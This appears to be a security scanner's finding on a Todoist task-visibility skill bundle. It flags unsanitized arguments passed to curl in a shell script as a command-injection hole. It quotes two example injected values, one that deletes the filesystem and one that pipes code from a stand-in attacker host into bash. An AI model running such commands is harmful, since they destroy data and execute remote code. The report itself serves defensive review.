Todoist 任务可见性管理

The skill bundle is classified as suspicious due to critical shell injection vulnerabilities found in `scripts/todoist_api.sh`. The script directly uses user-supplied arguments `$METHOD` and `$ENDPOINT` in `curl` commands without proper sanitization or validation, allowing an attacker to inject arbitrary shell commands (e.g., `GET; rm -rf /` or `tasks; curl evil.com | bash`) for remote code execution. While there is no explicit malicious payload or exfiltration code within the provided files, this vulnerability allows for such actions to be performed by an attacker.